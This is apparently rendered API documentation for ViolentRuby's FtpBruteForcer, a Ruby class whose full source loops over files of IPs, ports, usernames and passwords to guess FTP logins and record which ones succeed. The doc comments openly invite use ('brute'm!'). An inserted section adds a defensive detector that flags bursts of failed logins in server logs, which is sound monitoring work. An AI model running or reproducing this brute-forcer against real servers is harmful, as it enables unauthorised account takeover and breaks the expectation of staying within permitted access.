class ViolentRuby::FtpBruteForcer

The Ftp Brute Forcer class provides a simple way to brute-force an FTP server's credentials.

@author Kent 'picat' Gruber

@example Basic Usage

ftp = FtpBruteForcer.new
ftp.users     = "resources/ftp_users.txt"
ftp.passwords = "resources/ftp_passwords.txt"
ftp.ips       = "resources/ftp_ips.txt"
ftp.ports     = "resources/ftp_ports.txt"
# brute'm!
ftp.brute_force!
# => results

Attributes

ips[RW]

@attr [String] ips Path to file containing ip addresses.

passwords[RW]

@attr [String] passwords Path to file containing passwords.

ports[RW]

@attr [String] ports Path to file containing ports.

users[RW]

@attr [String] users Path to file containing users.

Public Class Methods

new(args = {})

Create a new Ftp Brute Forcer.

@param [Hash] args The options to create a new Ftp Brute Forcer.
@param args [String] :users The path to a file of users to attempt.
@param args [String] :passwords The path to a file of passwords to attempt.
@param args [String] :ips The path to a file of server ips to attempt to connect to.
@param args [String] :ports The path to a file of service ports to attempt to connect to.

# File lib/violent_ruby/ftp_brute_forcer/ftp_brute_forcer.rb, line 35
def initialize(args = {})
        @users     = args[:users]     if args[:users]     && File.readable?(args[:users]) 
        @passwords = args[:passwords] if args[:passwords] && File.readable?(args[:passwords])
        @ips       = args[:ips]       if args[:ips]       && File.readable?(args[:ips])
        @ports     = args[:ports]     if args[:ports]     && File.readable?(args[:ports])
        @ftp       = Net::FTP.new
end

Public Instance Methods

able_to_login?(args = {})

Check whether a given IP address, port, username and password allow a login.
@see brute_force
@param [Hash] args
@param args [String] :ip
@param args [String] :port
@param args [String] :username
@param args [String] :password
@return [Boolean]

# File lib/violent_ruby/ftp_brute_forcer/ftp_brute_forcer.rb, line 102
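def able_to_login?(args = {})
        @ftp.connect(args[:ip], args[:port])
        @ftp.login(args[:username], args[:password])
        # Only this exact reply text counts as success; any other wording is
        # reported as a failed login.
        if @ftp.welcome == "230 Login successful.\n"
                @ftp.close
                return true
        end
        # Close the session on the same Net::FTP object that opened it.
        @ftp.quit
        false
rescue
        # Connection errors and rejected logins both end up here.
        false
end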

brute_force(args = {}) { |result| ... }

Brute force some'a dem FTP login credz.

@param [Hash] args The options to brute force.
@param args [String] :users The path to a file of users to attempt.
@param args [String] :passwords The path to a file of passwords to attempt.
@param args [String] :ips The path to a file of server ips to attempt to connect to.
@param args [String] :ports The path to a file of service ports to attempt to connect to.

# File lib/violent_ruby/ftp_brute_forcer/ftp_brute_forcer.rb, line 50
def brute_force(args = {})
        meets_our_requirements?(args) 
        results   = []
        ips       = args[:ips]        || @ips 
        ports     = args[:ports]      || @ports
        users     = args[:users]      || @users
        passwords = args[:passwords]  || @passwords
        iterate_over(ips).each do |ip|
                iterate_over(ports).each do |port|
                        next unless connectable?(ip: ip, port: port)
                        iterate_over(users).each do |user|
                                iterate_over(passwords).each do |password|
                                        if able_to_login?(ip: ip, port: port, username: user, password: password)
                                                result = format_result("SUCCESS", ip, port, user, password)
                                        else
                                                result = format_result("FAILURE", ip, port, user, password)
                                        end
                                        results << result
                                        yield result if block_given?
                                end
                        end
                end
        end
        results
end

Also aliased as: brute_force!

brute_force!(args = {})

brute_force! is the same as brute_force

Alias for: brute_force
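
Seen from the server, the nested loops in brute_force are a burst of failed logins from one client, each on a fresh connection. The Ruby detector below is an added example, not part of ViolentRuby; the vsftpd-style log layout, the sample lines, the threshold and the window are all assumptions made for the illustration.

```ruby
require "time"

# Constructed vsftpd-style log lines (sample data, not from the page).
SAMPLE_LOG = <<~LOG
  Tue Mar  5 10:15:01 2024 [pid 4101] [admin] FAIL LOGIN: Client "203.0.113.7"
  Tue Mar  5 10:15:02 2024 [pid 4103] [admin] FAIL LOGIN: Client "203.0.113.7"
  Tue Mar  5 10:15:03 2024 [pid 4105] [root] FAIL LOGIN: Client "203.0.113.7"
  Tue Mar  5 10:15:04 2024 [pid 4107] [root] FAIL LOGIN: Client "203.0.113.7"
  Tue Mar  5 10:15:05 2024 [pid 4109] [root] OK LOGIN: Client "203.0.113.7"
  Tue Mar  5 10:20:00 2024 [pid 4200] [alice] FAIL LOGIN: Client "198.51.100.9"
  Tue Mar  5 10:20:09 2024 [pid 4202] [alice] OK LOGIN: Client "198.51.100.9"
LOG

# Assumed line layout: timestamp, pid, [user], OK|FAIL LOGIN, quoted client IP.
LOGIN_LINE = /\A(?<ts>\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}) \[pid \d+\] \[(?<user>[^\]]*)\] (?<status>OK|FAIL) LOGIN: Client "(?<ip>[^"]+)"/

# Flag clients with at least `threshold` failed logins inside a sliding
# `window` (seconds), and record a success that follows the burst.
def detect_ftp_bruteforce(log, threshold: 4, window: 60)
  recent = Hash.new { |h, ip| h[ip] = [] } # ip => [[time, user], ...]
  alerts = {}
  log.each_line do |line|
    next unless (m = LOGIN_LINE.match(line))
    time = Time.strptime(m[:ts], "%a %b %e %H:%M:%S %Y")
    ip   = m[:ip]
    if m[:status] == "FAIL"
      fails = recent[ip] << [time, m[:user]]
      fails.shift while time - fails.first[0] > window
      next if fails.size < threshold
      alert = (alerts[ip] ||= { ip: ip, first_seen: fails.first[0], users: [], success_as: nil })
      alert[:users] |= fails.map(&:last)
    elsif alerts[ip]
      # A login that succeeds after a flagged burst is the case to triage first.
      alerts[ip][:success_as] ||= m[:user]
    end
  end
  alerts.values
end

detect_ftp_bruteforce(SAMPLE_LOG).each { |alert| puts alert }
```

A single mistyped password, like the one from 198.51.100.9 in the sample, stays below the threshold and raises no alert.
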

connectable?(args = {})

Check if a given IP address and port can be connected to.
@see brute_force
@param [Hash] args the options to brute force.
@param args [String] :ip The ip address to attempt to connect to.
@param args [String] :port The port to attempt to connect to.
@return [Boolean]

# File lib/violent_ruby/ftp_brute_forcer/ftp_brute_forcer.rb, line 85
def connectable?(args = {})
        @ftp.connect(args[:ip], args[:port])
        return true if @ftp.last_response_code == "220"
        false
rescue
        false
end

Private Instance Methods

format_result(type, ip, port, user, password)

@api private
Format the results from brute force attempts.
@see brute_force
@param [String] type
@param [String] ip
@param [Integer] port
@param [String] user
@param [String] password
@return [Hash]

# File lib/violent_ruby/ftp_brute_forcer/ftp_brute_forcer.rb, line 127
def format_result(type, ip, port, user, password)
        { time: Time.now, type: type, ip: ip, port: port, user: user, password: password }
end

ips?(args = {})

@api private
Check if the given arguments contain ips, or if they have been set.
@see meets_our_requirements?
@param [Hash] args the options to brute force.
@param args [String] :ips
@return [Boolean]

# File lib/violent_ruby/ftp_brute_forcer/ftp_brute_forcer.rb, line 163
def ips?(args = {})
        return true if args[:ips] || @ips
        false 
end

iterate_over(file)

@api private
Iterate over each line in a file, stripping each line as it goes.
@see File
@param [String] file
@return [Enumerator]

# File lib/violent_ruby/ftp_brute_forcer/ftp_brute_forcer.rb, line 136
def iterate_over(file)
        File.foreach(file).map(&:strip)
end

meets_our_requirements?(args = {})

@api private
Check if the given arguments contain ip, port, password and user files.
@see brute_force
@param [Hash] args the options to brute force.
@param args [String] :ips
@param args [String] :ports
@param args [String] :passwords
@param args [String] :users
@return [Boolean]

# File lib/violent_ruby/ftp_brute_forcer/ftp_brute_forcer.rb, line 149
def meets_our_requirements?(args = {})
        raise "No ip addresses to connect to." unless ips?(args)
        raise "No ports to connect to."        unless ports?(args)
        raise "No passwords to try."           unless passwords?(args)
        raise "No users to try."               unless users?(args)
        true
end

passwords?(args = {})

@api private
Check if the given arguments contain passwords, or if they have been set.
@see meets_our_requirements?
@param [Hash] args
@param args [String] :passwords
@return [Boolean]

# File lib/violent_ruby/ftp_brute_forcer/ftp_brute_forcer.rb, line 174
def passwords?(args = {})
        return true if args[:passwords] || @passwords
        false
end

ports?(args = {})

@api private
Check if the given arguments contain ports, or if they have been set.
@see meets_our_requirements?
@param [Hash] args
@param args [String] :ports
@return [Boolean]

# File lib/violent_ruby/ftp_brute_forcer/ftp_brute_forcer.rb, line 189
def ports?(args = {})
        return true if args[:ports] || @ports
        false
end

users?(args = {})

@api private
Check if the given arguments contain users, or if they have been set.
@see meets_our_requirements?
@param [Hash] args
@param args [String] :users
@return [Boolean]

# File lib/violent_ruby/ftp_brute_forcer/ftp_brute_forcer.rb, line 200
def users?(args = {})
        return true if args[:users] || @users
        false
end